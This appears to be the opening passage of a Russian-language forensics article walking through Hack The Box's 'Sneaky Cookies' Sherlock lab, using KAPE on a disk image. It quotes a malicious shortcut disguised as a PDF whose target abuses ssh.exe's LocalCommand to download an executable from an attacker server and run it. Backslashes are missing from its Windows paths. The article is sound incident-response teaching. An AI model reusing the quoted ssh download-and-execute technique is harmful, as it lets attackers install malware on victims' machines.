Physical Address
304 North Cardinal St.
Dorchester Center, MA 02124
Physical Address
304 North Cardinal St.
Dorchester Center, MA 02124
Сегодня на примере расследования инцидента я покажу, как иногда можно найти улики в кеше RDP. Изучив закешированные данные удаленного графического подключения, мы буквально увидим, что делал злоумышленник.
Упражняться мы будем на лабораторной работе OpTinselTrace24-1: Sneaky Cookies из раздела Sherlocks популярного обучающего ресурса Hack The Box.
Из описания лабы узнаём, что мы будем работать со скомпрометированной учетной записью пользователя Bingle Jollybeard, который пытался настроить свою систему для удаленного доступа.
Нам предоставлены данные диска C, на котором есть учетка пользователя, логи и prefetch-файлы.
Для начала, чтобы облегчить себе задачу, прогоним папку C через KAPE.
Справка: KAPE
Kroll Artifact Parser and Extractor (KAPE) — это мощная утилита для цифровой криминалистики. Она позволяет быстро собирать и анализировать цифровые артефакты с устройств. Ее автор Эрик Циммерман — известный эксперт в области DFIR. KAPE оптимизирует процессы сбора данных, позволяя находить критически важные артефакты за считаные минуты. Инструмент поддерживает гибкую настройку с помощью модулей для сбора (Targets) и анализа (Modules), что делает его универсальным и удобным для расследования инцидентов, проверки на компрометацию и анализа подозрительной активности. KAPE широко применяется в судебной экспертизе, корпоративной безопасности и реагировании на инциденты благодаря своей скорости, точности и способности обрабатывать огромные объемы данных.
kape.exe --msource "C:путь к папкеTRIAGE-L3-BELLS" --module !EZParser --mdest "С:путь к папке с результатом" --trace --debug
KAPE собрал нам все необходимые для расследования данные в удобном формате. Он распарсил все логи, файлы предварительной загрузки и некоторые кусты реестра. Заодно конвертировал их в формат CSV.
info
Дальше в статье я буду параллельно приводить примеры использования других инструментов на случай, если ты захочешь повторить исследование без KAPE.
Чтобы ответить на первый вопрос лабораторной работы, нам нужно найти подозрительные файлы в пользовательском каталоге. Давай обратимся к исходной папке C, где в директории Documents пользователя Bingle Jollybeard лежит файл christmas_slab.pdf
.
Подозрительно здесь лишь необычное отображение ярлыка для формата PDF. При детальном изучении оказывается, что это не PDF, а ярлык (.lnk).
Злоумышленник использовал этот файл для фишинга. Ссылка указывает на такой адрес:
C:WindowsSystem32OpenSSHssh.exe -o "PermitLocalCommand=yes" -o "StrictHostKeyChecking=no" -o "LocalCommand=scp [email protected]:/home/revenge/christmas-sale.exe c:userspublic. && c:userspublicchristmas-sale.exe" [email protected]
Здесь запускается SSH, чтобы загрузить с управляющего сервера и выполнить файл christmas-sale.exe
.
Источник: xakep.ru